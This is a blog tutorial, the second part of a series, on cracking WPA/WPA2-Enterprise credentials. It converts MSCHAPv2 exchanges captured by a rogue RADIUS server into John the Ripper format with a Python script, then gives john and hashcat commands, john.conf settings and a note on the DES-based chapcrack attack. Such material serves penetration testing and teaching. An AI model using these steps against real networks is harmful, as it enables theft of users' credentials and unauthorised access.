How To: Hack WPA/WPA2-Enterprise Part 2


In the second part of this tutorial we crack the credentials captured by the rogue RADIUS server in part one. What the server logged are MSCHAPv2 challenge/response pairs rather than plain password hashes, and John the Ripper can attack them directly. John ships with Kali by default, so there is nothing to install.

Using John the Ripper

If you don't know anything about this tool, you can check this Wikipedia article.

First, we have to put the captured credentials into a format John understands. To do so we use a simple script that converts the freeradius-credsXXXXX.txt file into John's format; you can download it here.

Visit the previous link, copy the script text to your clipboard and open a terminal.
Type:

nano radiustojohn.py

Paste the text from your clipboard, hit Control + O to save the changes, then Control + X to exit. Then make the file executable:

chmod +x radiustojohn.py

Now execute the script with the freeradius-credsXXXXXXX.txt file as its argument:

./radiustojohn.py <path to the freeradius-creds file>
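As an added example of what that conversion step does (my own code, not the radiustojohn.py script linked above), here is a converter that performs the same job. It assumes the freeradius-wpe credential log layout: an "mschap:" line carrying the timestamp, followed by indented username:, challenge: and response: lines whose bytes are separated by colons. The 8-byte challenge is the MSCHAPv2 challenge hash and the 24-byte response is the NT response, which is the NTLMv1-style pair John's netntlm format expects, so the script emits one user:$NETNTLM$challenge$response line per unique exchange. The three records in SAMPLE_LOG are constructed; their hex values are made up and do not correspond to any real password.

```python
#!/usr/bin/env python3
"""Convert a freeradius-wpe credential log into John the Ripper's netntlm format.

Added example for this tutorial, not the radiustojohn.py script the post links to.
Assumed log layout (freeradius-wpe / hostapd-wpe):

    mschap: <timestamp>
        username: <name>
        challenge: <8 colon-separated hex bytes>
        response: <24 colon-separated hex bytes>
"""
import re
import sys

# Constructed sample log: the hex values are made up and crack to nothing.
# alice appears twice (a client that retried) to show de-duplication.
SAMPLE_LOG = """\
mschap: Mon Aug 29 17:29:15 2016
\tusername: alice
\tchallenge: 4a:ea:51:0b:44:1b:43:f9
\tresponse: 96:ec:a5:2f:d1:42:de:ef:8b:2f:1e:28:d4:a5:e1:99:b9:1a:98:cc:e7:22:c5:70
mschap: Mon Aug 29 17:29:16 2016
\tusername: CORP\\bob
\tchallenge: 11:22:33:44:55:66:77:88
\tresponse: 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77
mschap: Mon Aug 29 17:29:40 2016
\tusername: alice
\tchallenge: 4a:ea:51:0b:44:1b:43:f9
\tresponse: 96:ec:a5:2f:d1:42:de:ef:8b:2f:1e:28:d4:a5:e1:99:b9:1a:98:cc:e7:22:c5:70
"""

FIELD_RE = re.compile(r"^\s*(username|challenge|response):\s*(.*?)\s*$")


def parse_wpe_log(text):
    """Return a list of (username, challenge_hex, response_hex) tuples.

    A record starts at each 'mschap:' line. Incomplete records (truncated log,
    a non-MSCHAP method) or records with the wrong byte counts for MSCHAPv2 are
    skipped instead of being emitted as lines John would reject.
    """
    records, current = [], {}
    for line in text.splitlines():
        if line.startswith("mschap:"):
            if current:
                records.append(current)
            current = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2)
    if current:
        records.append(current)

    out = []
    for rec in records:
        if not all(k in rec for k in ("username", "challenge", "response")):
            continue
        chal = rec["challenge"].replace(":", "").lower()
        resp = rec["response"].replace(":", "").lower()
        # 8-byte challenge and 24-byte NT response, hex digits only
        if not (re.fullmatch(r"[0-9a-f]{16}", chal) and re.fullmatch(r"[0-9a-f]{48}", resp)):
            continue
        out.append((rec["username"], chal, resp))
    return out


def to_john(records):
    """Format records as 'user:$NETNTLM$<challenge>$<response>' lines.

    Duplicate exchanges are dropped so John does not crack the same pair twice.
    A colon in the username would break John's field splitting, so it is replaced.
    """
    seen, lines = set(), []
    for user, chal, resp in records:
        line = f"{user.replace(':', '_')}:$NETNTLM${chal}${resp}"
        if line not in seen:
            seen.add(line)
            lines.append(line)
    return lines


def main(argv):
    # With a path: convert that freeradius-creds file. Without one: show the sample.
    text = open(argv[1], encoding="utf-8", errors="replace").read() if len(argv) > 1 else SAMPLE_LOG
    for line in to_john(parse_wpe_log(text)):
        print(line)


if __name__ == "__main__":
    main(sys.argv)
```

Saved as radiustojohn.py, it is run as ./radiustojohn.py freeradius-credsXXXXX.txt > freeradius.john, and the resulting file is fed to john --format=netntlm exactly as in the steps below. The $NETNTLM$ form is used rather than the colon-separated user:::lmresp:ntresp:challenge layout because it leaves no ambiguity about which field is the challenge.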

This generates a freeradius.john file that John can read. Type:

john --format=netntlm freeradius.john

While John runs you can press almost any key to see its status (q or Control + C aborts). In my run, about 3 seconds were enough to guess 12 passwords. The weaker the password, the faster it falls; a strong one can take years. With no other options John first tries single-crack mode, then its built-in wordlist, then incremental brute force, and every cracked password is stored in john.pot, so re-running the same command with --show lists what has been recovered so far. You can also supply your own wordlist:

john --format=netntlm --wordlist=<path to your dictionary file> freeradius.john

If you know something about the password, for example its length, you can restrict John's incremental mode to that length by editing its configuration file, /etc/john/john.conf. Let's make a backup of that file first:

cd /etc/john/
cp john.conf john.conf.old

Now that we've made a backup of the original file, let's change it.

leafpad john.conf

Find the [Incremental:All] section of the file and change MinLen and MaxLen to the password length. If you know the password is exactly 8 characters long, set MinLen = 8 and MaxLen = 8. Keep in mind that John 1.7.x only supports MaxLen up to 8 in incremental mode (1.8 raised that limit), and that editing this section changes every future incremental run until you restore the backup. Save the changes and run John in incremental mode:

john --format=netntlm --incremental=All freeradius.john
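For reference, here is the relevant john.conf fragment, added here rather than copied from the post. The first section shows the stock values as shipped with John 1.7.x; the second is a custom section of my own (the name Len8 is an assumption, any name works) that fixes the length at 8 without touching the default section, so no backup is needed and the rest of incremental mode keeps working as before.

```ini
# Stock section as shipped in a John 1.7.x john.conf
[Incremental:All]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 8
CharCount = 95

# Added section: same charset, but only 8-character candidates.
# Select it with:  john --format=netntlm --incremental=Len8 freeradius.john
[Incremental:Len8]
File = $JOHN/all.chr
MinLen = 8
MaxLen = 8
CharCount = 95
```

The same effect can be had without editing the config at all on jumbo builds, which accept --min-length and --max-length on the command line.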

John's jumbo build also supports OpenCL for many formats, and hashcat (mode 5500, NetNTLMv1/MSCHAPv2) cracks these exchanges on a GPU far faster than a CPU. One caveat worth knowing: the MSCHAPv2 response is the challenge encrypted with three DES keys derived from the user's NT hash, so the NT hash itself can be recovered by exhausting the 2^56 DES key space regardless of how strong the password is (the chapcrack attack). Password complexity alone therefore does not protect PEAP/MSCHAPv2; clients validating the RADIUS server certificate does.

That's all, I hope you've enjoyed! Ask any question!

4 Comments

Again great stuff, really appreciate the time you put into this :)

Cheers,
Washu

Thanks, Washu.

Thanks for these tutorials, Jako!

Thank you for reading it!
